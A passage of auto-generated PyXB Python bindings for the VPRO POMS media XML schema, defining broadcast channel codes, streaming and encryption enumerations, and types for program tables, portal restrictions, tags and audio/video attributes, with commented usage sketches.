channelEnum.R5ST = channelEnum._CF_enumeration.addEnumeration(unicode_value='R5ST', tag='R5ST')
channelEnum.RAD6 = channelEnum._CF_enumeration.addEnumeration(unicode_value='RAD6', tag='RAD6')
channelEnum.REGR = channelEnum._CF_enumeration.addEnumeration(unicode_value='REGR', tag='REGR')
channelEnum.RFRY = channelEnum._CF_enumeration.addEnumeration(unicode_value='RFRY', tag='RFRY')
channelEnum.DRRD = channelEnum._CF_enumeration.addEnumeration(unicode_value='DRRD', tag='DRRD')
channelEnum.RNOO = channelEnum._CF_enumeration.addEnumeration(unicode_value='RNOO', tag='RNOO')
channelEnum.ROST = channelEnum._CF_enumeration.addEnumeration(unicode_value='ROST', tag='ROST')
channelEnum.RGEL = channelEnum._CF_enumeration.addEnumeration(unicode_value='RGEL', tag='RGEL')
channelEnum.RFLE = channelEnum._CF_enumeration.addEnumeration(unicode_value='RFLE', tag='RFLE')
channelEnum.RBRA = channelEnum._CF_enumeration.addEnumeration(unicode_value='RBRA', tag='RBRA')
channelEnum.RUTR = channelEnum._CF_enumeration.addEnumeration(unicode_value='RUTR', tag='RUTR')
channelEnum.RNOH = channelEnum._CF_enumeration.addEnumeration(unicode_value='RNOH', tag='RNOH')
channelEnum.RWST = channelEnum._CF_enumeration.addEnumeration(unicode_value='RWST', tag='RWST')
channelEnum.RRIJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='RRIJ', tag='RRIJ')
channelEnum.LRAD = channelEnum._CF_enumeration.addEnumeration(unicode_value='LRAD', tag='LRAD')
channelEnum.RZEE = channelEnum._CF_enumeration.addEnumeration(unicode_value='RZEE', tag='RZEE')
channelEnum.COMM = channelEnum._CF_enumeration.addEnumeration(unicode_value='COMM', tag='COMM')
channelEnum.RVER = channelEnum._CF_enumeration.addEnumeration(unicode_value='RVER', tag='RVER')
channelEnum.SLAM = channelEnum._CF_enumeration.addEnumeration(unicode_value='SLAM', tag='SLAM')
channelEnum.SKYR = channelEnum._CF_enumeration.addEnumeration(unicode_value='SKYR', tag='SKYR')
channelEnum.BNRN = channelEnum._CF_enumeration.addEnumeration(unicode_value='BNRN', tag='BNRN')
channelEnum.KINK = channelEnum._CF_enumeration.addEnumeration(unicode_value='KINK', tag='KINK')
channelEnum.PCAZ = channelEnum._CF_enumeration.addEnumeration(unicode_value='PCAZ', tag='PCAZ')
channelEnum.QMUS = channelEnum._CF_enumeration.addEnumeration(unicode_value='QMUS', tag='QMUS')
channelEnum.R538 = channelEnum._CF_enumeration.addEnumeration(unicode_value='R538', tag='R538')
channelEnum.GOLD = channelEnum._CF_enumeration.addEnumeration(unicode_value='GOLD', tag='GOLD')
channelEnum.ARRO = channelEnum._CF_enumeration.addEnumeration(unicode_value='ARRO', tag='ARRO')
channelEnum.FUNX = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNX', tag='FUNX')
channelEnum.FUNA = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNA', tag='FUNA')
channelEnum.FUNR = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNR', tag='FUNR')
channelEnum.FUNU = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNU', tag='FUNU')
channelEnum.FUNG = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNG', tag='FUNG')
channelEnum.FUNB = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNB', tag='FUNB')
channelEnum.FUND = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUND', tag='FUND')
channelEnum.FUNH = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNH', tag='FUNH')
channelEnum.FUNL = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNL', tag='FUNL')
channelEnum.FUNJ = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNJ', tag='FUNJ')
channelEnum.FUNS = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNS', tag='FUNS')
channelEnum.FUNF = channelEnum._CF_enumeration.addEnumeration(unicode_value='FUNF', tag='FUNF')
channelEnum.CLAS = channelEnum._CF_enumeration.addEnumeration(unicode_value='CLAS', tag='CLAS')
channelEnum.BEL1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BEL1', tag='BEL1')
channelEnum.BEL2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BEL2', tag='BEL2')
channelEnum.KLAR = channelEnum._CF_enumeration.addEnumeration(unicode_value='KLAR', tag='KLAR')
channelEnum.BBR1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR1', tag='BBR1')
channelEnum.BBR2 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR2', tag='BBR2')
channelEnum.BBR3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR3', tag='BBR3')
channelEnum.BBR4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBR4', tag='BBR4')
channelEnum.BBWS = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBWS', tag='BBWS')
channelEnum.BBCX = channelEnum._CF_enumeration.addEnumeration(unicode_value='BBCX', tag='BBCX')
channelEnum.NDR3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='NDR3', tag='NDR3')
channelEnum.WDR4 = channelEnum._CF_enumeration.addEnumeration(unicode_value='WDR4', tag='WDR4')
channelEnum.WDR3 = channelEnum._CF_enumeration.addEnumeration(unicode_value='WDR3', tag='WDR3')
channelEnum.ONL1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='ONL1', tag='ONL1')
channelEnum.OMEG = channelEnum._CF_enumeration.addEnumeration(unicode_value='OMEG', tag='OMEG')
channelEnum.D24K = channelEnum._CF_enumeration.addEnumeration(unicode_value='D24K', tag='D24K')
channelEnum.H1NL = channelEnum._CF_enumeration.addEnumeration(unicode_value='H1NL', tag='H1NL')
channelEnum.SYFY = channelEnum._CF_enumeration.addEnumeration(unicode_value='SYFY', tag='SYFY')
channelEnum.SBS9 = channelEnum._CF_enumeration.addEnumeration(unicode_value='SBS9', tag='SBS9')
channelEnum.DIXD = channelEnum._CF_enumeration.addEnumeration(unicode_value='DIXD', tag='DIXD')
channelEnum.BRNL = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRNL', tag='BRNL')
channelEnum.FOXL = channelEnum._CF_enumeration.addEnumeration(unicode_value='FOXL', tag='FOXL')
channelEnum.TLC = channelEnum._CF_enumeration.addEnumeration(unicode_value='TLC_', tag='TLC')
channelEnum.BCFS = channelEnum._CF_enumeration.addEnumeration(unicode_value='BCFS', tag='BCFS')
channelEnum.AMC = channelEnum._CF_enumeration.addEnumeration(unicode_value='AMC_', tag='AMC')
channelEnum.FLM1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='FLM1', tag='FLM1')
channelEnum.ZGS1 = channelEnum._CF_enumeration.addEnumeration(unicode_value='ZGS1', tag='ZGS1')
channelEnum.BRTZ = channelEnum._CF_enumeration.addEnumeration(unicode_value='BRTZ', tag='BRTZ')
channelEnum.RTLF = channelEnum._CF_enumeration.addEnumeration(unicode_value='RTLF', tag='RTLF')
channelEnum.TVDR = channelEnum._CF_enumeration.addEnumeration(unicode_value='TVDR', tag='TVDR')
channelEnum.VRTC = channelEnum._CF_enumeration.addEnumeration(unicode_value='VRTC', tag='VRTC')
channelEnum.n10TB = channelEnum._CF_enumeration.addEnumeration(unicode_value='10TB', tag='n10TB')
channelEnum.XXXX = channelEnum._CF_enumeration.addEnumeration(unicode_value='XXXX', tag='XXXX')
channelEnum._InitializeFacetMap(channelEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'channelEnum', channelEnum)
_module_typeBindings.channelEnum = channelEnum
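# Usage sketch (illustrative only, not emitted by PyXB): each enumeration
# member is a class attribute whose value is the XSD lexical form. Several
# channel codes are padded to four characters in the schema, so the Python
# tag and the wire value can differ:
#
#   assert channelEnum.EEN == 'EEN_'    # tag 'EEN', lexical value 'EEN_'
#   assert channelEnum.LUNE == 'LUNE'   # tag and value coincide here
#
# Tags that would start with a digit get an 'n' prefix to remain valid
# Python identifiers, e.g. channelEnum.n3SAT for the lexical value '3SAT'.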
# Atomic simple type: {urn:vpro:media:2009}streamingStatusValue
class streamingStatusValue (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'streamingStatusValue')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3246, 2)
_Documentation = None
streamingStatusValue._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=streamingStatusValue, enum_prefix=None)
streamingStatusValue.OFFLINE = streamingStatusValue._CF_enumeration.addEnumeration(unicode_value='OFFLINE', tag='OFFLINE')
streamingStatusValue.ONLINE = streamingStatusValue._CF_enumeration.addEnumeration(unicode_value='ONLINE', tag='ONLINE')
streamingStatusValue.UNSET = streamingStatusValue._CF_enumeration.addEnumeration(unicode_value='UNSET', tag='UNSET')
streamingStatusValue._InitializeFacetMap(streamingStatusValue._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'streamingStatusValue', streamingStatusValue)
_module_typeBindings.streamingStatusValue = streamingStatusValue
# Atomic simple type: {urn:vpro:media:2009}encryption
class encryption (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'encryption')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3254, 2)
_Documentation = None
encryption._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=encryption, enum_prefix=None)
encryption.NONE = encryption._CF_enumeration.addEnumeration(unicode_value='NONE', tag='NONE')
encryption.DRM = encryption._CF_enumeration.addEnumeration(unicode_value='DRM', tag='DRM')
encryption._InitializeFacetMap(encryption._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'encryption', encryption)
_module_typeBindings.encryption = encryption
# Complex type {urn:vpro:media:2009}mediaTableType with content type ELEMENT_ONLY
class mediaTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}mediaTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'mediaTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 57, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}schedule uses Python identifier schedule
__schedule = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'schedule'), 'schedule', '__urnvpromedia2009_mediaTableType_urnvpromedia2009schedule', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 46, 2), )
    schedule = property(__schedule.value, __schedule.set, None, "\n        Programs of type 'BROADCAST' can contain schedule events. A schedule indicates on which channel and at what time the program is broadcast. A schedule is a container that holds the schedule events of different programs for a certain period of time.\n      ")
# Element {urn:vpro:media:2009}programTable uses Python identifier programTable
__programTable = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'programTable'), 'programTable', '__urnvpromedia2009_mediaTableType_urnvpromedia2009programTable', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6), )
programTable = property(__programTable.value, __programTable.set, None, 'A table with all program objects in this container')
# Element {urn:vpro:media:2009}groupTable uses Python identifier groupTable
__groupTable = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'groupTable'), 'groupTable', '__urnvpromedia2009_mediaTableType_urnvpromedia2009groupTable', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6), )
groupTable = property(__groupTable.value, __groupTable.set, None, 'A table with all group objects in this container')
# Element {urn:vpro:media:2009}locationTable uses Python identifier locationTable
__locationTable = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'locationTable'), 'locationTable', '__urnvpromedia2009_mediaTableType_urnvpromedia2009locationTable', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6), )
locationTable = property(__locationTable.value, __locationTable.set, None, None)
# Attribute publisher uses Python identifier publisher
__publisher = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publisher'), 'publisher', '__urnvpromedia2009_mediaTableType_publisher', pyxb.binding.datatypes.string)
__publisher._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 76, 4)
__publisher._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 76, 4)
publisher = property(__publisher.value, __publisher.set, None, None)
# Attribute publicationTime uses Python identifier publicationTime
__publicationTime = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'publicationTime'), 'publicationTime', '__urnvpromedia2009_mediaTableType_publicationTime', pyxb.binding.datatypes.dateTime)
__publicationTime._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 77, 4)
__publicationTime._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 77, 4)
publicationTime = property(__publicationTime.value, __publicationTime.set, None, None)
# Attribute version uses Python identifier version
__version = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'version'), 'version', '__urnvpromedia2009_mediaTableType_version', pyxb.binding.datatypes.short)
__version._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 78, 4)
__version._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 78, 4)
version = property(__version.value, __version.set, None, None)
_ElementMap.update({
__schedule.name() : __schedule,
__programTable.name() : __programTable,
__groupTable.name() : __groupTable,
__locationTable.name() : __locationTable
})
_AttributeMap.update({
__publisher.name() : __publisher,
__publicationTime.name() : __publicationTime,
__version.name() : __version
})
_module_typeBindings.mediaTableType = mediaTableType
Namespace.addCategoryObject('typeBinding', 'mediaTableType', mediaTableType)
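# Usage sketch (hypothetical file name; CreateFromDocument is the parser
# helper PyXB generates near the top of a bindings module). Assumes an XML
# document whose root element is bound to mediaTableType:
#
#   import codecs
#   xml = codecs.open('mediatable.xml', 'r', 'utf-8').read()
#   table = CreateFromDocument(xml)
#   if table.programTable is not None:
#       for prog in table.programTable.program:   # plural element: list-like
#           print(prog)
#   print(table.publisher, table.publicationTime, table.version)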
# Complex type {urn:vpro:media:2009}programTableType with content type ELEMENT_ONLY
class programTableType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}programTableType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'programTableType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 81, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}program uses Python identifier program
__program = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'program'), 'program', '__urnvpromedia2009_programTableType_urnvpromedia2009program', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 25, 2), )
    program = property(__program.value, __program.set, None, '\n        This is the most used entity in POMS. It represents e.g. one broadcast program or one web-only clip. It represents a standalone entity that a consumer can view or listen to.\n      ')
_ElementMap.update({
__program.name() : __program
})
_AttributeMap.update({
})
_module_typeBindings.programTableType = programTableType
Namespace.addCategoryObject('typeBinding', 'programTableType', programTableType)
# Complex type {urn:vpro:media:2009}portalRestrictionType with content type SIMPLE
class portalRestrictionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}portalRestrictionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'portalRestrictionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 330, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute start uses Python identifier start
__start = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'start'), 'start', '__urnvpromedia2009_portalRestrictionType_start', pyxb.binding.datatypes.dateTime)
__start._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
__start._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 326, 4)
start = property(__start.value, __start.set, None, None)
# Attribute stop uses Python identifier stop
__stop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'stop'), 'stop', '__urnvpromedia2009_portalRestrictionType_stop', pyxb.binding.datatypes.dateTime)
__stop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
__stop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 327, 4)
stop = property(__stop.value, __stop.set, None, None)
# Attribute portalId uses Python identifier portalId
__portalId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'portalId'), 'portalId', '__urnvpromedia2009_portalRestrictionType_portalId', pyxb.binding.datatypes.string)
__portalId._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 333, 8)
__portalId._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 333, 8)
portalId = property(__portalId.value, __portalId.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__start.name() : __start,
__stop.name() : __stop,
__portalId.name() : __portalId
})
_module_typeBindings.portalRestrictionType = portalRestrictionType
Namespace.addCategoryObject('typeBinding', 'portalRestrictionType', portalRestrictionType)
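# Construction sketch (values are made up): portalRestrictionType carries
# simple string content plus optional dateTime attributes, so an instance
# can be built from its text value with the attributes set afterwards:
#
#   import pyxb.binding.datatypes as xsd
#   restriction = portalRestrictionType('STERREN24')   # simple content
#   restriction.portalId = 'STERREN24'
#   restriction.start = xsd.dateTime(2009, 1, 1, 12, 0, 0)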
# Complex type {urn:vpro:media:2009}tagType with content type SIMPLE
class tagType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}tagType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'tagType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 372, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute {http://www.w3.org/XML/1998/namespace}lang uses Python identifier lang
__lang = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'lang'), 'lang', '__urnvpromedia2009_tagType_httpwww_w3_orgXML1998namespacelang', pyxb.binding.xml_.STD_ANON_lang)
__lang._DeclarationLocation = None
__lang._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 375, 8)
lang = property(__lang.value, __lang.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__lang.name() : __lang
})
_module_typeBindings.tagType = tagType
Namespace.addCategoryObject('typeBinding', 'tagType', tagType)
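# Construction sketch (made-up tag text): tagType is simple string content
# with a namespace-qualified xml:lang attribute:
#
#   tag = tagType('cultuur')
#   tag.lang = 'nl'    # serialized as the xml:lang attribute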
# Complex type {urn:vpro:media:2009}portalsType with content type ELEMENT_ONLY
class portalsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}portalsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'portalsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 455, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}portal uses Python identifier portal
__portal = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'portal'), 'portal', '__urnvpromedia2009_portalsType_urnvpromedia2009portal', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6), )
portal = property(__portal.value, __portal.set, None, None)
_ElementMap.update({
__portal.name() : __portal
})
_AttributeMap.update({
})
_module_typeBindings.portalsType = portalsType
Namespace.addCategoryObject('typeBinding', 'portalsType', portalsType)
# Complex type {urn:vpro:media:2009}repeatType with content type SIMPLE
class repeatType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}repeatType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'repeatType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 461, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute isRerun uses Python identifier isRerun
__isRerun = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isRerun'), 'isRerun', '__urnvpromedia2009_repeatType_isRerun', pyxb.binding.datatypes.boolean, required=True)
__isRerun._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 464, 8)
__isRerun._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 464, 8)
isRerun = property(__isRerun.value, __isRerun.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__isRerun.name() : __isRerun
})
_module_typeBindings.repeatType = repeatType
Namespace.addCategoryObject('typeBinding', 'repeatType', repeatType)
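# Construction sketch: the isRerun attribute is declared required=True, so
# PyXB raises a validation error on serialization if it is left unset:
#
#   rerun = repeatType('Herhaling van zondagmiddag')   # free-text content
#   rerun.isRerun = True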
# Complex type {urn:vpro:media:2009}avAttributesType with content type ELEMENT_ONLY
class avAttributesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}avAttributesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'avAttributesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 469, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}bitrate uses Python identifier bitrate
__bitrate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'bitrate'), 'bitrate', '__urnvpromedia2009_avAttributesType_urnvpromedia2009bitrate', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6), )
bitrate = property(__bitrate.value, __bitrate.set, None, None)
# Element {urn:vpro:media:2009}byteSize uses Python identifier byteSize
__byteSize = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'byteSize'), 'byteSize', '__urnvpromedia2009_avAttributesType_urnvpromedia2009byteSize', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6), )
byteSize = property(__byteSize.value, __byteSize.set, None, None)
# Element {urn:vpro:media:2009}avFileFormat uses Python identifier avFileFormat
__avFileFormat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avFileFormat'), 'avFileFormat', '__urnvpromedia2009_avAttributesType_urnvpromedia2009avFileFormat', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6), )
avFileFormat = property(__avFileFormat.value, __avFileFormat.set, None, None)
# Element {urn:vpro:media:2009}videoAttributes uses Python identifier videoAttributes
__videoAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'videoAttributes'), 'videoAttributes', '__urnvpromedia2009_avAttributesType_urnvpromedia2009videoAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6), )
videoAttributes = property(__videoAttributes.value, __videoAttributes.set, None, None)
# Element {urn:vpro:media:2009}audioAttributes uses Python identifier audioAttributes
__audioAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'audioAttributes'), 'audioAttributes', '__urnvpromedia2009_avAttributesType_urnvpromedia2009audioAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6), )
audioAttributes = property(__audioAttributes.value, __audioAttributes.set, None, None)
_ElementMap.update({
__bitrate.name() : __bitrate,
__byteSize.name() : __byteSize,
__avFileFormat.name() : __avFileFormat,
__videoAttributes.name() : __videoAttributes,
__audioAttributes.name() : __audioAttributes
})
_AttributeMap.update({
})
_module_typeBindings.avAttributesType = avAttributesType
Namespace.addCategoryObject('typeBinding', 'avAttributesType', avAttributesType)
# Complex type {urn:vpro:media:2009}videoAttributesType with content type ELEMENT_ONLY
class videoAttributesType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}videoAttributesType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'videoAttributesType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 501, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}color uses Python identifier color
__color = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'color'), 'color', '__urnvpromedia2009_videoAttributesType_urnvpromedia2009color', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6), )
color = property(__color.value, __color.set, None, None)
# Element {urn:vpro:media:2009}videoCoding uses Python identifier videoCoding
__videoCoding = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'videoCoding'), 'videoCoding', '__urnvpromedia2009_videoAttributesType_urnvpromedia2009videoCoding', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6), )
videoCoding = property(__videoCoding.value, __videoCoding.set, None, None)
# Element {urn:vpro:media:2009}aspectRatio uses Python identifier aspectRatio
__aspectRatio = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'aspectRatio'), 'aspectRatio', '__urnvpromedia2009_videoAttributesType_urnvpromedia2009aspectRatio', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6), )
aspectRatio = property(__aspectRatio.value, __aspectRatio.set, None, None)
# Attribute height uses Python identifier height
__height = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'height'), 'height', '__urnvpromedia2009_videoAttributesType_height', pyxb.binding.datatypes.short)
__height._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 507, 4)
__height._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 507, 4)
height = property(__height.value, __height.set, None, None)
# Attribute heigth uses Python identifier heigth
__heigth = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'heigth'), 'heigth', '__urnvpromedia2009_videoAttributesType_heigth', pyxb.binding.datatypes.short)
__heigth._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 508, 4)
__heigth._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 508, 4)
heigth = property(__heigth.value, __heigth.set, None, '\n This obviously is a typo.\n ')
# Attribute width uses Python identifier width
__width = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'width'), 'width', '__urnvpromedia2009_videoAttributesType_width', pyxb.binding.datatypes.short)
__width._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 515, 4)
__width._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 515, 4)
width = property(__width.value, __width.set, None, None)
_ElementMap.update({
__color.name() : __color,
__videoCoding.name() : __videoCoding,
__aspectRatio.name() : __aspectRatio
})
_AttributeMap.update({
__height.name() : __height,
__heigth.name() : __heigth,
__width.name() : __width
})
_module_typeBindings.videoAttributesType = videoAttributesType
Namespace.addCategoryObject('typeBinding', 'videoAttributesType', videoAttributesType)
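# Construction sketch: both 'height' and the misspelled legacy 'heigth'
# attribute exist because the schema keeps the typo for compatibility (see
# the documentation on the attribute above); new code should set 'height':
#
#   va = videoAttributesType()
#   va.width = 1024
#   va.height = 576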
